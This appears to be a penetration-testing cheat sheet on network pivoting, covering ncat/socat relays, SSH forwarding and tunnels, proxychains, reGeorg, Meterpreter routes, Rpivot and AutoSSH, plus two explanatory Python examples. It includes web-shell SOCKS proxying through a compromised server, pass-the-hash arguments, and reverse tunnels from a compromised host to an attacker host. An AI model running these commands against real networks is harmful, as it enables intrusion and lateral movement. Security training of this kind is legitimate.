A Penetration Testing Framework
Relay types (an ncat form and a socat form are given for each):

| Type | Use Case |
| --- | --- |
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Can't bind, so connect out to bridge two hosts. |

### Listen - Listen

```shell
ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socat -v tcp-listen:8080 tcp-listen:9090
```

We connect to the first side of the listen->listen trigger and send the file as input.

```shell
ncat localhost 8080 < file
```

We connect to the second side of the listen->listen trigger and write the output to disk.

```shell
ncat localhost 9090 > newfile
```

### Listen - Connect

```shell
ncat -l -v -p 8080 -c "ncat localhost 9090"
socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
```

We connect to the listen side of the listen->connect trigger and send the file as input. Note that ncat takes the destination port as a positional argument; `-p` sets the source port, which is not what we want here. Start the 9090 listener below before connecting, since the trigger connects out as soon as the first client arrives.

```shell
ncat localhost 8080 < file
```

We wait and listen for the connect from the listen->connect trigger and write the file to disk.

```shell
ncat -l -p 9090 > newfile
```

### Connect - Connect

Remote host listeners must be bound first.

```shell
ncat localhost 8080 -c "ncat localhost 9090"
socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
```

We bind and listen on port 8080 and send the file as input.

```shell
ncat -l -p 8080 < file
```

We bind and listen on port 9090 and write the data to disk.

```shell
ncat -l -p 9090 > newfile
```
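All three rows reduce to one bridge between two TCP endpoints, each of which is either accepted (listen) or dialed (connect). The following Python relay is an added example written for this page, not part of the original cheat sheet or of ncat/socat; `demo_listen_listen` runs the Listen - Listen row end to end on loopback with constructed ports 18080/19090 and returns what the receiving side got.

```python
import socket
import threading
import time

def _pump(src, dst):  # copy one direction until EOF, then half-close dst so its peer sees EOF too
    try:
        for chunk in iter(lambda: src.recv(4096), b""):
            dst.sendall(chunk)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass  # peer already gone

def _endpoint(kind, host, port):  # "listen" = ncat -l / tcp-listen, "connect" = ncat host port
    if kind == "connect":
        return socket.create_connection((host, port))
    with socket.create_server((host, port)) as srv:  # sets SO_REUSEADDR like socat's reuseaddr
        return srv.accept()[0]

def relay(side_a, side_b):  # side = ("listen"|"connect", host, port); any of the three rows
    a, b = _endpoint(*side_a), _endpoint(*side_b)
    back = threading.Thread(target=_pump, args=(b, a), daemon=True)
    back.start()
    _pump(a, b)  # full duplex: a->b here, b->a in the helper thread
    back.join()
    a.close()
    b.close()

def _dial(addr, tries=100):  # retry until the relay thread has bound its listener
    for _ in range(tries):
        try:
            return socket.create_connection(addr)
        except OSError:
            time.sleep(0.05)
    raise OSError("nothing listening on %s:%d" % addr)

def demo_listen_listen(payload, p_in=18080, p_out=19090):
    # Loopback run of the Listen - Listen row (constructed ports): sender -> :p_in -> relay -> :p_out -> receiver
    worker = threading.Thread(target=relay, daemon=True,
                              args=(("listen", "127.0.0.1", p_in), ("listen", "127.0.0.1", p_out)))
    worker.start()
    with _dial(("127.0.0.1", p_in)) as sender:
        sender.sendall(payload)
        sender.shutdown(socket.SHUT_WR)  # `ncat localhost 8080 < file`: EOF once the file is sent
        with _dial(("127.0.0.1", p_out)) as receiver:  # `ncat localhost 9090 > newfile`
            got = b"".join(iter(lambda: receiver.recv(4096), b""))
    worker.join(5)
    return got
```

Swapping either tuple in `demo_listen_listen` for a `("connect", host, port)` side gives the Listen - Connect and Connect - Connect rows with the same `relay` function.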
## Dynamic SOCKS Proxy

This opens a SOCKS listener on the client and can be used with proxychains to forward client traffic through the remote server.

```shell
ssh -D8080 [user]@[host]
```

## Local Port Forwarding

This binds [bindaddr]:[port] on the SSH client host and forwards connections through the SSH server to [dsthost]:[dstport].

```shell
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```

## Remote Port Forwarding

This binds [bindaddr]:[port] on the remote server and tunnels connections back through the SSH client side to [localhost]:[localport]. Binding a non-loopback [bindaddr] on the server side additionally requires GatewayPorts to be enabled in its sshd_config.

```shell
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
```
## Establish VPN over SSH

The following options must be enabled in sshd_config on the server side.

```
PermitRootLogin yes
PermitTunnel yes
```

```shell
ssh [user]@[host] -w any:any
```

You can see the established tun interface by typing `ifconfig -a`.

The interfaces and forwarding must still be configured. This assumes that we are going to forward through the remote server. We are also assuming that the server's main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections. Bracketed values are placeholders for the tunnel addresses and subnets you choose; tun0 also has to be brought up on both ends before the routes will carry traffic.

```shell
# Client side: address the client end of the tunnel
ip addr add [client tun ip] peer [server tun ip] dev tun0
# Once the server is set up, run the following to add routes
route add -net [remote subnet] gw [server tun ip]
```

```shell
# Server side: address the server end, enable forwarding and NAT out of eth0
ip addr add [server tun ip] peer [client tun ip] dev tun0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -s [tun subnet] -o eth0 -j MASQUERADE
```
## Proxychains

The configuration file /etc/proxychains.conf must be edited to point at your SOCKS proxy. Typically this is an SSH dynamic forward or another type of tunnel; make sure the ports match.

```
socks4 localhost 8080
```

Now, to run any network tool through the proxy, prefix it like so. Remember that you can't run raw-socket scans through a SOCKS4 proxy, which only carries TCP connections; you need to set up an SSH VPN tunnel or something similar for that type of functionality.

```shell
proxychains nmap
```
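proxychains speaks SOCKS4 to the tunnel (the `socks4` line above) while Metasploit's module below is `socks4a`; the difference is whether the client resolves names itself or hands the hostname to the proxy, and both forms carry only a TCP CONNECT or BIND, which is why raw-socket scans cannot traverse them. The following Python encoder/decoder is an added example for this page, not code from proxychains, Metasploit or any other tool named here; the targets and user ids in the test are constructed.

```python
import ipaddress
import struct

SOCKS4_CONNECT, SOCKS4_BIND = 1, 2          # the only commands SOCKS4 defines: TCP only, no ICMP/raw
REPLY_GRANTED, REPLY_REJECTED = 0x5A, 0x5B  # "request granted" / "request rejected or failed"

def build_socks4_request(cmd, port, target, userid=""):
    """Client side. SOCKS4 when target is an IPv4 literal, SOCKS4a (DSTIP 0.0.0.1 + hostname) otherwise."""
    try:
        ip, host = ipaddress.IPv4Address(target), b""
    except ValueError:  # not a literal: let the proxy resolve it, as a socks4a client does
        ip, host = ipaddress.IPv4Address("0.0.0.1"), target.encode("ascii") + b"\0"
    return struct.pack("!BBH4s", 4, cmd, port, ip.packed) + userid.encode("latin-1") + b"\0" + host

def parse_socks4_request(buf):
    """Proxy side. Returns the decoded request; raises ValueError on malformed input."""
    if len(buf) < 9 or buf[0] != 4:
        raise ValueError("not a SOCKS4 request")
    cmd, port = buf[1], struct.unpack("!H", buf[2:4])[0]
    if cmd not in (SOCKS4_CONNECT, SOCKS4_BIND):
        raise ValueError("unknown command %d" % cmd)
    ip, rest = ipaddress.IPv4Address(buf[4:8]), buf[8:]
    nul = rest.find(b"\0")
    if nul < 0:
        raise ValueError("unterminated USERID")
    userid, rest, host = rest[:nul].decode("latin-1"), rest[nul + 1:], None
    if ip in ipaddress.IPv4Network("0.0.0.0/24") and ip.packed[3] != 0:
        # SOCKS4a marker 0.0.0.x (x != 0): a NUL-terminated hostname follows the USERID
        nul = rest.find(b"\0")
        if nul < 0:
            raise ValueError("SOCKS4a request without hostname")
        host, rest = rest[:nul].decode("ascii"), rest[nul + 1:]
    return {"cmd": cmd, "port": port, "ip": str(ip), "host": host, "userid": userid, "trailing": rest}

def build_socks4_reply(granted, port=0, ip="0.0.0.0"):
    """Proxy side reply: VN is always 0, CD 0x5A on success, then the bound port/address."""
    code = REPLY_GRANTED if granted else REPLY_REJECTED
    return struct.pack("!BBH4s", 0, code, port, ipaddress.IPv4Address(ip).packed)

def parse_socks4_reply(buf):
    """Client side: True if the proxy granted the request."""
    if len(buf) != 8 or buf[0] != 0:
        raise ValueError("not a SOCKS4 reply")
    return buf[1] == REPLY_GRANTED
```

With a plain `socks4` proxy the client must resolve the target name itself before building the request, so internal names the pivot host can see are only reachable by IP unless the proxy accepts the 4a form.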
## reGeorg

reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx, ashx, jsp, or php. Simply upload the desired file to the webserver, then start the local SOCKS listener against it.

```shell
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
```

You are now free to use your regular tools through proxychains.
## Meterpreter

Meterpreter allows you to create pivoting routes within the framework for use with any of the built-in modules. To add a route for a subnet through the current session, use the following (bracketed values are placeholders).

```
run autoroute -s [subnet]
```

To print routes:

```
run autoroute -p
```

Now you can run other tools through Meterpreter using proxychains, by starting the framework's SOCKS server on the port your proxychains.conf points at.

```
use auxiliary/server/socks4a
set SRVPORT 8080
```

Below will forward rdesktop sessions from localhost port 3389 to the target through Meterpreter as a tunnel.

```
portfwd add -L [bindaddr] -l 3389 -r [target] -p 3389
```
## Rpivot

Rpivot is a great SOCKS-proxy-based pivot tool that works like SSH's dynamic proxy -D option, but in the reverse direction: the client runs on the compromised host and connects back to your server.

Server side:

```shell
python server.py --proxy-port 1080 --server-port 9443 --server-ip [server ip]
```

Client side:

```shell
python client.py --server-ip [server ip] --server-port 9443
```

The server will now have a SOCKS proxy on port 1080 that forwards traffic through the client.

Rpivot also works through corporate proxies.

```shell
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
  --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
```

If you prefer passing the hash, then you're also in luck.

```shell
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
  --ntlm-proxy-port 8080 --domain CORP --username jdoe \
  --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
```
## AutoSSH

AutoSSH is a tool that automatically restarts SSH sessions and tunnels when they drop. Run from the compromised host, the following line opens port 2222 on host attacker and tunnels it back to the compromised host on port 22 (a remote forward, hence -R; -L would instead open the port on the compromised host). You would then be able to set up a dynamic SSH SOCKS proxy against localhost:2222 on attacker and forward through the compromised host as normal.

```shell
autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -R 2222:localhost:22 [evil]@[attacker]
```